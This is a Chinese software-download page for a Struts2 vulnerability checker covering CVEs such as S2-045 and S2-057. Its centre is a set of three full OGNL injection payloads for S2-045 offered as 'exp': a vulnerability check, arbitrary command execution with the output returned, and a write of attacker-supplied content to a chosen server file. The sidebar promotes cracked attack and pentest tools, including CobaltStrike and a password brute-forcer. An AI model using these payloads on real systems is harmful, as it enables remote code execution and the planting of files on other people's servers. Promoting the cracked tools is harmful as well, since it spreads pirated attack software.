- 软件介绍人气软件相关文章下载地址↓
-
Struts2是一个基于MVC设计模式的Web应用框架,但2存在远程代码执行的漏洞,现在Struts2漏洞检测工具2017版增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部分WAF防护,存在S2-045就存在S2-046。需要此款Struts2漏洞检测工具的朋友可下载试试!
当Struts2开启devMode模式时,将导致严重远程代码执行漏洞。如果WebService启动权限为最高权限时,可远程执行任意命令,包括关机、建立新用户、以及删除服务器上所有文件等等。
支持S2-057 CVE-2018-11776 、S2-048 CVE-2017-9791、S2-046 CVE-2017-5638、S2-045 CVE-2017-5638、S2-037 CVE-2016-4438、 S2-032 CVE-2016-3081 、S2-020 CVE-2014-0094 、S2-019 CVE-2013-4316等漏洞检测!
Apache Struts2存在远程代码执行的高危漏洞(S2-057/CVE-2018-11776),该漏洞由Semmle Security Research team的安全研究员Man YueMo发现。该漏洞是由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符namespace,可能导致远程代码执行。同理,url标签未设置value和action值且上层动作未设置或用通配符namespace时也可能导致远程代码执行!
相关exp:
S2-045:
1、验证漏洞,修改Content-Type,返回内容为“webpath”代表存在漏洞。
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):
((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).
(#res=@org.apache.struts2.ServletActionContext@getResponse()).
(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('web')).
(#res.getWriter().print('path')).(#res.getWriter().flush()).(#res.getWriter().close())}
2、执行命令
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):
((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).
(#res=@org.apache.struts2.ServletActionContext@getResponse()).
(#res.setContentType('text/html;charset=UTF-8')).(#s=new java.util.Scanner((new
java.lang.ProcessBuilder('[cmd]'.toString().split('s'))).start().getInputStream()).useDelimiter('AAAA')).
(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).
(#res.getWriter().close()).(#s.close())}
3、上传文件:
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):
((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).
(#res=@org.apache.struts2.ServletActionContext@getResponse()).
(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new
java.io.FileWriter([path])).append(#req.getHeader('test')).close()).(#res.getWriter().print('oko')).
(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).
(#res.getWriter().close())} -
人气软件
-
路由密码暴力破解工具(WebCracker) v4.0 绿色中文免费版
969KB | 简体中文
-
360安全卫士最新版 v13.0.0.2209 官方免费安装版
112MB | 简体中文
-
AppScan(Web漏洞扫描工具) v10.0.0 v10.0.0 简体中文特别版(附安
518MB | 简体中文
-
渗透测试工具burpsuite pro v1.7.26 永不过期特别版 32/64位
25.4MB | 简体中文
-
渗透利器CobaltStrike 4.0 免费汉化版(含原版+补丁)
84.6MB | 简体中文
-
AppScan 9.0.3.6 简体中文特别版(附破解补丁+安装破解教程)
1.08GB | 简体中文
-
13.9MB | 简体中文
-
Struts2漏洞检查工具2018版(S2-045/S2-057) v2.0 最新绿色版(含P
2.77MB | 简体中文
-
477KB | 简体中文
-
-
相关文章
- 渗透测试软件Burp Suite v2023.11.1.3 永不过期免费中文版
- 隐私安全保护软件 Cyber Privacy Suite 破解补丁 v4.0.4 附激活教程
- Anti DDoS Guardian破解补丁 v6.1.0.0 免费安装版 附激活教程
- 渗透测试工具Burp Suite Professional 2023.1.1 免费激活版
- FritzBox防护软件 Abelssoft RouterGuard 2023 v1.72.43040 直装破解版 附安装教程
- 超级网管大师 v6.2 安装版
- 动易网站管理系统 v2006 绿色版
- 网络守护神破解版 v4.5 安装版
- 局域网qq监控工具 v5.50 安装版
- 网站后台密码猜解工具 v1.1 绿色版
-
网友评论
-
下载声明
☉ 解压密码:www.jb51.net 就是本站主域名,希望大家看清楚,[ 分享码的获取方法 ]可以参考这篇文章
☉ 推荐使用 [ 迅雷 ] 下载,使用 [ WinRAR v5 ] 以上版本解压本站软件。
☉ 如果这个软件总是不能下载的请在评论中留言,我们会尽快修复,谢谢!
☉ 下载本站资源,如果服务器暂不能下载请过一段时间重试!或者多试试几个下载地址
☉ 如果遇到什么问题,请评论留言,我们定会解决问题,谢谢大家支持!
☉ 本站提供的一些商业软件是供学习研究之用,如用于商业用途,请购买正版。
☉ 本站提供的Struts2漏洞检查工具2018版(S2-045/S2-057) v2.0 最新绿色版(含POC和修复补丁包)资源来源互联网,版权归该下载资源的合法拥有者所有。